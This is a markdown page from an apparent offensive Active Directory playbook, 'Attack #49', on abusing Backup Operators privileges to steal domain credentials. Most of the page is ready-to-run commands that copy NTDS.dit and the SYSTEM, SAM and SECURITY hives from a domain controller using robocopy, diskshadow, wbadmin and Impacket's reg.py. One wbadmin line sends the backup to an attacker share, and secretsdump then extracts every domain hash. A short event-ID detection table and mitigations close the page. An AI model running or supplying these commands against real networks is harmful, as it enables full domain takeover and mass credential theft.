attack-49-abusing-backup-operators-group.md (4062B)
1 --- 2 title: "Attack #49 โ Abusing Backup Operators Group" 3 description: "Members of Backup Operators have the SeBackupPrivilege and SeRestorePrivilege, which grants them the ability to read and write any file on the system โโฆ" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory", "privilege-escalation", "hashing"] 7 tools: ["Impacket", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/๐ฃ Attack #49 โ Abusing Backup Operators Group.md" 11 --- 12 # ๐ฃ Attack #49 โ Abusing Backup Operators Group 13 14 *** 15 16 ## ๐ How It Works 17 18 Members of **Backup Operators** have the `SeBackupPrivilege` and `SeRestorePrivilege`, which grants them the ability to **read and write any file on the system** โ bypassing NTFS ACLs entirely. This means a Backup Operator can copy the NTDS.dit database and SYSTEM hive from a DC, extract all domain hashes offline, and achieve full domain compromise. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Membership in Backup Operators** | Provides SeBackupPrivilege + SeRestorePrivilege | 27 | **Logon access to DC** | RDP or WinRM (Backup Operators can log on locally by default) | 28 29 *** 30 31 ## ๐ป Full Commands 32 33 ```powershell 34 # โโ Verify privileges โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 35 whoami /priv 36 # SeBackupPrivilege = Read any file 37 # SeRestorePrivilege = Write any file 38 39 # โโ Method 1: robocopy backup mode โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 40 robocopy /B C:\Windows\NTDS C:\Temp ntds.dit 41 reg save HKLM\SYSTEM C:\Temp\SYSTEM 42 43 # โโ Method 2: diskshadow + robocopy โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 44 # Create diskshadow script: 45 echo "set context persistent nowriters" > script.txt 46 echo "add volume C: alias mydrive" >> script.txt 47 echo "create" >> script.txt 48 echo "expose %mydrive% Z:" >> script.txt 49 50 diskshadow /s script.txt 51 robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit 52 53 # โโ Method 3: wbadmin (Windows Server Backup) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 54 wbadmin start backup -backuptarget:\\ATTACKER\share -include:C: -quiet 55 # Then extract NTDS.dit from backup 56 57 # โโ Parse offline โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 58 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile backup_op_dump 59 ``` 60 61 ```bash 62 # โโ Remote via reg.py (SeBackupPrivilege) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 63 reg.py corp.local/backup_user:'Password1'@DC01.corp.local save -keyName 'HKLM\SAM' -o SAM 64 reg.py corp.local/backup_user:'Password1'@DC01.corp.local save -keyName 'HKLM\SYSTEM' -o SYSTEM 65 reg.py corp.local/backup_user:'Password1'@DC01.corp.local save -keyName 'HKLM\SECURITY' -o SECURITY 66 secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL 67 ``` 68 69 *** 70 71 ## ๐ก๏ธ Detection โ Event IDs 72 73 | Event ID | Source | What to Look For | 74 |---|---|---| 75 | **4672** | Security Log | SeBackupPrivilege/SeRestorePrivilege assigned at logon | 76 | **4663** | Security Log | Object access โ NTDS.dit file read | 77 | **8222** | Security Log | Shadow copy created | 78 79 *** 80 81 ## ๐ Attack Chain Context 82 83 ``` 84 [Backup Operators] โโโ SeBackupPrivilege โ read NTDS.dit โ all domain hashes 85 โ 86 โโโโ ๐ Bypass NTFS ACLs โ copy any file including NTDS.dit 87 โโโโ ๐ Offline parsing โ no DCSync needed 88 โโโโ ๐ Defeated by: limit Backup Operators membership, monitor privilege use 89 ``` 90 91 *** 92 93 > โ **Attack #49 โ Backup Operators complete.**